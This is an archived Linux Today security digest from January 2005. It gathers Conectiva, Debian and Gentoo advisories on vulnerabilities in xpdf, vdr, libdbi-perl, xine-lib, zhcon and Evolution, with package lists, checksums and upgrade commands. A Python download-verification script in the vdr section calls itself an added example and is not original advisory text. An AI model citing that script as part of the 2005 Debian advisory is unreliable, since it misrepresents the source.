Linux Today: Linux News On Internet Time.






Security Digest: January 25, 2005

Jan 26, 2005, 04:45

Conectiva Linux


CONECTIVA LINUX SECURITY ANNOUNCEMENT

PACKAGE : xpdf
SUMMARY : Fixes for xpdf vulnerabilities
DATE : 2005-01-25 13:50:00
ID : CLA-2005:921
RELEVANT RELEASES : 9, 10


DESCRIPTION
xpdf[1] is a viewer for Portable Document Format (PDF) files whose code is reused by many other projects, such as gpdf, cups and tetex.

iDefense reported[2] two further issues[3,4] in the xpdf code: two buffer overflows that could lead to remote code execution.

SOLUTION
It is recommended that all xpdf, gpdf, cups and/or tetex users upgrade their packages.

REFERENCES
1. http://www.foolabs.com/xpdf
2. http://www.idefense.com/application/poi/display?id=172&type=vulnerabilities
3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1125
4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0064

UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/10/SRPMS/cups-1.1.20-62425U10_8cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/gpdf-0.131-56565U10_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/xpdf-3.00-48231U10_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/tetex-2.0.2-47988U10_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-devel-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-devel-static-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-doc-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-foomatic-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-libs-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-netatalk-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-netware-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-ppd-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-serial-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-am-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ar-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-az-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-be-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-bn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ca-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-cs-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-cy-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-da-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-de-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-el-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-en_CA-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-en_GB-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-eo-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-es-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-eu-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ga-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-gl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-he-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hu-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-id-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-is-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-it-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ja-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-kn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ko-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-lt-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-lv-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-mk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ml-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-mn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ms-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-nl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-nn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-no-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pt-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pt_BR-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ro-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ru-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sq-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sv-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ta-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-th-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-tr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-uk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-vi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-wa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-zh_CN-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-zh_TW-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/xpdf-3.00-48231U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/xpdf-progs-3.00-48231U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-afm-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-devel-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-doc-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-dvilj-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-dvips-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-latex-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-xdvi-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cups-1.1.18-29091U90_7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/xpdf-2.01-22930U90_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-devel-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-devel-static-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-doc-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-libs-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/xpdf-2.01-22930U90_4cl.i386.rpm

ADDITIONAL INSTRUCTIONS
The apt tool can be used to perform RPM packages upgrades:

  • run: apt-get update
  • after that, execute: apt-get upgrade

Detailed instructions regarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en
Copyright (c) 2004 Conectiva Inc.
http://www.conectiva.com

Debian GNU/Linux


Debian Security Advisory DSA 656-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : vdr
Vulnerability : insecure file access
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2005-0071

Javier Fernández-Sanguino Peña from the Debian Security Audit Team has discovered that the vdr daemon, which is used for video disk recorders for DVB cards, can overwrite arbitrary files.

For the stable distribution (woody) this problem has been fixed in version 1.0.0-1woody2.

For the unstable distribution (sid) this problem has been fixed in version 1.2.6-6.

We recommend that you upgrade your vdr package.

Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2.dsc
Size/MD5 checksum: 580 b948b3b68a18e5f909dd9479a9841f8a
http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2.tar.gz
Size/MD5 checksum: 431964 3e2a7e792b21258a56bfb54ff7aee702

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 68802 a881e0f34fdf75cbb9444221412f29e3
http://security.debian.org/pool/updates/main/v/vdr/vdr-daemon_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 151954 a43a1eba9ed48ca81f4953cc2bb17236
http://security.debian.org/pool/updates/main/v/vdr/vdr-kbd_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 152562 37f7d263a57337e6a5087944e15e9f46
http://security.debian.org/pool/updates/main/v/vdr/vdr-lirc_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 153020 1b08452b0cb57abe74024521fbca4c32
http://security.debian.org/pool/updates/main/v/vdr/vdr-rcu_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 154642 b0f7570129a1cd8c0594258750207cba

These files will probably be moved into the stable distribution on its next update.
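The wget and dpkg -i steps above, with the advisory's own Size/MD5 line checked between them. This is an added example and not part of the DSA: the function names (parse_dsa_files, verify_package, fetch_verify_install) are mine, and the two URL/checksum pairs embedded as sample input are copied from the i386 list above. The parser also accepts the shorter "Size/MD5:" form that the Ubuntu notice further down this page uses.

```python
"""Verify a downloaded Debian package against the Size/MD5 line of a DSA
before handing it to dpkg -i.  Added example, not part of the advisory."""
import hashlib
import os
import subprocess
import sys
import urllib.request


def md5_hex(path, chunk=1 << 16):
    """Hex MD5 of a file, streamed so a large .deb never sits in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_package(path, expected_size, expected_md5):
    """Return (ok, reason).  Both the size and the digest must match."""
    if not os.path.isfile(path):
        return False, "file missing"
    size = os.path.getsize(path)
    if size != expected_size:
        return False, f"size mismatch: expected {expected_size}, got {size}"
    digest = md5_hex(path)
    if digest != expected_md5.lower():
        return False, f"md5 mismatch: expected {expected_md5}, got {digest}"
    return True, "ok"


def parse_dsa_files(text):
    """Parse URL lines followed by 'Size/MD5 checksum: N HEX' (Debian) or
    'Size/MD5: N HEX' (Ubuntu) lines.  Returns a list of (url, size, md5)."""
    entries = []
    pending_url = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(("http://", "https://")):
            pending_url = line
        elif line.startswith("Size/MD5") and pending_url:
            _, _, rest = line.partition(":")
            size, md5 = rest.split()
            entries.append((pending_url, int(size), md5.lower()))
            pending_url = None
    return entries


def fetch_verify_install(url, size, md5, install=True):
    """The advisory's wget / dpkg -i steps with the check inserted between them.
    A file that fails the check is deleted and never reaches dpkg."""
    dest = url.rsplit("/", 1)[-1]
    urllib.request.urlretrieve(url, dest)
    ok, why = verify_package(dest, size, md5)
    if not ok:
        os.remove(dest)
        raise SystemExit(f"refusing to install {dest}: {why}")
    if install:
        subprocess.check_call(["dpkg", "-i", dest])


# Constructed sample input: the two vdr i386 entries copied from DSA 656-1.
DSA_656_EXCERPT = """\
http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 68802 a881e0f34fdf75cbb9444221412f29e3
http://security.debian.org/pool/updates/main/v/vdr/vdr-daemon_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 151954 a43a1eba9ed48ca81f4953cc2bb17236
"""

if __name__ == "__main__":
    # Fetch and check both files; pass --install to also run dpkg -i.
    for url, size, md5 in parse_dsa_files(DSA_656_EXCERPT):
        fetch_verify_install(url, size, md5, install="--install" in sys.argv)
```

The digest only ties the download to what the advisory lists: it catches a corrupt or substituted mirror copy, and practical MD5 collision attacks were already public by 2005, so the trust anchor is the PGP signature on the advisory mail itself (and, for apt users, the signed Release file), not the checksum.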




Debian Security Advisory DSA 658-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : libdbi-perl
Vulnerability : insecure temporary file
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2005-0077

Javier Fernández-Sanguino Peña from the Debian Security Audit Project discovered that the DBI library, the Perl5 database interface, creates a temporary PID file in an insecure manner. This can be exploited by a malicious local user to overwrite arbitrary files owned by the user running the affected parts of the library.

For the stable distribution (woody) this problem has been fixed in version 1.21-2woody2.

For the unstable distribution (sid) this problem has been fixed in version 1.46-6.

We recommend that you upgrade your libdbi-perl package.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2.dsc
Size/MD5 checksum: 587 778cd2081c6c996e962e5ccd6100b1e8
http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2.diff.gz
Size/MD5 checksum: 12117 b96cca05e51fcab8c6ca55c00644d3fd
http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21.orig.tar.gz
Size/MD5 checksum: 208384 c781eee2559de5e4a72e28a8120cb1d9

Alpha architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_alpha.deb
Size/MD5 checksum: 345058 014d047dbb24fd94d1a1437244644cd8

ARM architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_arm.deb
Size/MD5 checksum: 342540 896f3fe01eb1702df395c8f4ea3b6877

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_i386.deb
Size/MD5 checksum: 337802 82348c4c37c6636b85b5fa18d5e00f66

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_ia64.deb
Size/MD5 checksum: 356854 b800c42bcdbd3fef74ab630f1a066682

HP Precision architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_hppa.deb
Size/MD5 checksum: 345808 5cebb7436af6e22050de51ea895a62ed

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_m68k.deb
Size/MD5 checksum: 338592 202c8161fcdb618b6fbe236499d560af

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_mips.deb
Size/MD5 checksum: 338102 3689ef5cf728e7108206cd9140f682bc

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_mipsel.deb
Size/MD5 checksum: 338494 bd6f8206898feb05d613f06e30b78e5b

PowerPC architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_powerpc.deb
Size/MD5 checksum: 342782 dd2b2637b3c15d472c5053c586a99e1d

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_s390.deb
Size/MD5 checksum: 340908 274999cd7e3758367fef5f39fa44e888

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_sparc.deb
Size/MD5 checksum: 344732 5bf3bb91f4a0de5af59d6a2a7d70cecf

These files will probably be moved into the stable distribution on its next update.



Debian Security Advisory DSA 657-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : xine-lib
Vulnerability : buffer overflow
Problem-Type : local (remote)
Debian-specific: no
CVE ID : CAN-2004-1379
BugTraq ID : 11205

A heap overflow has been discovered in the DVD subpicture decoder of xine-lib. An attacker could cause arbitrary code to be executed on the victim's host by supplying a malicious MPEG stream. Because users can be tricked into viewing a malicious network stream, this is remotely exploitable.

For the stable distribution (woody) this problem has been fixed in version 0.9.8-2woody3.

For the unstable distribution (sid) this problem has been fixed in version 1-rc6a-1.

We recommend that you upgrade your libxine packages.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody3.dsc
Size/MD5 checksum: 760 fdead2b906645e98cd98482da245f9fe
http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody3.diff.gz
Size/MD5 checksum: 1432 d1228b2ea29024dc31d7e73716e430b8
http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8.orig.tar.gz
Size/MD5 checksum: 1766178 d8fc9b30e15b50af8ab7552bbda7aeda

Alpha architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_alpha.deb
Size/MD5 checksum: 260790 35b1fcb3d630159bffba57cd03ee7198
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_alpha.deb
Size/MD5 checksum: 815898 5b969f8b91cd217a62fbe1206e0dae22

ARM architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_arm.deb
Size/MD5 checksum: 302736 503e7f984fcdc022730ae84bda3d7893
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_arm.deb
Size/MD5 checksum: 671030 3ca1bdc2e19e8547593ec227457bf934

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_i386.deb
Size/MD5 checksum: 261202 4fa616c95b299f01eb6c4d3984696a97
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_i386.deb
Size/MD5 checksum: 807774 2880560bd06ebf751184bd8cb0345974

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_ia64.deb
Size/MD5 checksum: 260670 474f66c0a7ffdd1f1728ca22a05556f3
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_ia64.deb
Size/MD5 checksum: 953146 001f5e510918a2b1cb52e2d560094224

HP Precision architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_hppa.deb
Size/MD5 checksum: 260840 af3ab8871f26ec99c2e5a4c67821415c
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_hppa.deb
Size/MD5 checksum: 846422 cf09d101cec9e33e4074e6d9e5e7868a

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_m68k.deb
Size/MD5 checksum: 292502 ba71fa3ee20e67e92e4ecfab2028f12b
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_m68k.deb
Size/MD5 checksum: 617432 68fd34079a32e9881f095c7ccc458822

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_mips.deb
Size/MD5 checksum: 299528 feca6217a5df51fe46d1e5185a36c0f4
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_mips.deb
Size/MD5 checksum: 652674 80f688f5856c786f2432619491ac5b56

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_mipsel.deb
Size/MD5 checksum: 299564 5c2165f1adad2172acfddb42b2be92d1
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_mipsel.deb
Size/MD5 checksum: 654450 4937401c8ea1d16ebfabf83b9321cc4e

PowerPC architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_powerpc.deb
Size/MD5 checksum: 261054 9345084069863c90f69d17d4cd55e31d
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_powerpc.deb
Size/MD5 checksum: 742158 7fd5ef486125947c8418ca95b803df8f

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_s390.deb
Size/MD5 checksum: 302236 c539ecfcf4a0dfd19b4637fc93f558b9
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_s390.deb
Size/MD5 checksum: 662496 2d6aede160abfc88f5cf5e7f2e19014a

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_sparc.deb
Size/MD5 checksum: 260942 db51371b3aad43f02fead312971c8150
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_sparc.deb
Size/MD5 checksum: 807478 2f4c13dab590a77d3f57aa923617bc8c

These files will probably be moved into the stable distribution on its next update.



Debian Security Advisory DSA 655-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : zhcon
Vulnerability : missing privilege release
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2005-0072

Erik Sjölund discovered that zhcon, a fast console CJK system using the Linux framebuffer, accesses a user-controlled configuration file with elevated privileges. Thus, it is possible to read arbitrary files.

For the stable distribution (woody) this problem has been fixed in version 0.2-4woody3.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your zhcon package.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3.dsc
Size/MD5 checksum: 571 cef550eb0e12c8841fb19dec63b57c18
http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3.diff.gz
Size/MD5 checksum: 18162 5757142ee30a5d3e990180a44bfbf8cd
http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2.orig.tar.gz
Size/MD5 checksum: 4727022 7a15d08e903c0d40f1f659b23185c4c0

Alpha architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_alpha.deb
Size/MD5 checksum: 4577314 574567f7d5ff0c730d7c8403da284d62

ARM architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_arm.deb
Size/MD5 checksum: 4566364 e9cc7274596bd612b85b832945d4fedc

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_i386.deb
Size/MD5 checksum: 4549436 adcaa080b69de7c3d7de5d5c58bd2ee6

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_ia64.deb
Size/MD5 checksum: 4594976 ff8e34b0df2d5548918698972ae71ac4

HP Precision architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_hppa.deb
Size/MD5 checksum: 4590474 68576eb8887b9bda98afc3548704d491

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_m68k.deb
Size/MD5 checksum: 4545894 419dcce4d28053e9527888f064dd9a9d

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_mips.deb
Size/MD5 checksum: 4557002 70955d5fd0205214a4add453ebda3c9c

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_mipsel.deb
Size/MD5 checksum: 4555974 81e127f1ebecb1519ccc08472909a6cc

PowerPC architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_powerpc.deb
Size/MD5 checksum: 4548730 7d99eb0b961e83cf9067355c39ba656b

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_s390.deb
Size/MD5 checksum: 4544774 172e282c5c27a5d12a2e3b709b7e89c2

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_sparc.deb
Size/MD5 checksum: 4546018 f6d5b53efb642de658498c091884ff7e

These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Gentoo Linux


Gentoo Linux Security Advisory GLSA 200501-35

http://security.gentoo.org/


Severity: High
Title: Evolution: Integer overflow in camel-lock-helper
Date: January 24, 2005
Bugs: #79183
ID: 200501-35


Synopsis

An overflow in the camel-lock-helper application can be exploited by an attacker to execute arbitrary code with elevated privileges.

Background

Evolution is a GNOME groupware application similar to Microsoft Outlook.

Affected packages


     Package                /  Vulnerable  /  Unaffected

  1  mail-client/evolution     <= 2.0.2        >= 2.0.2-r1

Description

Max Vozeler discovered an integer overflow in the camel-lock-helper application, which is installed as setgid mail by default.

Impact

A local attacker could exploit this vulnerability to execute malicious code with the privileges of the 'mail' group. A remote attacker could also set up a malicious POP server to execute arbitrary code when an Evolution user connects to it.

Workaround

There is no known workaround at this time.

